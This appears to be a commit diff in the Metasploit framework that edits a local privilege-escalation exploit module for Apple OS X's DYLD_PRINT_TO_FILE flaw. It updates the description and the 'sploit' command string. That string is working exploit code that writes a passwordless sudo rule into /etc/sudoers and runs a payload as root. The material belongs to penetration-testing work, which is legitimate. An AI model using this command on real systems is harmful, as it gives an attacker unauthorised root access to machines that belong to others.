FIxup pr #5758
parent
165cb195bf
commit
9d8dd2f8bd
|
@ -17,8 +17,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
super(update_info(info,
|
||||
'Name' => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
|
||||
'Description' => %q{
|
||||
In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
|
||||
supported for suid binaries. This allows an arbitrary file write as root.
|
||||
In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE
|
||||
environment variable, usually used for redirecting logging data to a
|
||||
file, instead of the usual stderr. Due to a design error, this feature
|
||||
can be abused by a local attacker to write arbitrary files as root, via
|
||||
restricted, SUID root binaries.
|
||||
},
|
||||
'Author' => [
|
||||
'Stefan Esser', # Vulnerability discovery and PoC
|
||||
|
@ -69,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def sploit
|
||||
"/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
|
||||
%q{/bin/sh -c "echo 'echo \\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &"}
|
||||
end
|
||||
|
||||
def binary_payload
|
Loading…
Reference in New Issue